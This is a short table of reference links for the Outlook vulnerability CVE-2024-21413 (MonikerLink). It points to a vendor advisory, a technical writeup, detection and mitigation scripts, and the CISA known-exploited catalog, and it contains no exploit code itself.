| msrc.microsoft.com |
GitHub CVE
vendor-advisory
|
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413 |
| research.checkpoint.com |
NVD API
Technical Description
|
https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/ |
| vicarius.io |
NVD API
Exploit
|
https://www.vicarius.io/vsociety/posts/cve-2024-21413-critical-monikerlink-vulnerability-affecting-microsoft-outlook-detection-script |
| vicarius.io |
NVD API
Mitigation
|
https://www.vicarius.io/vsociety/posts/cve-2024-21413-critical-monikerlink-vulnerability-affecting-microsoft-outlook-mitigation-script |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-21413 |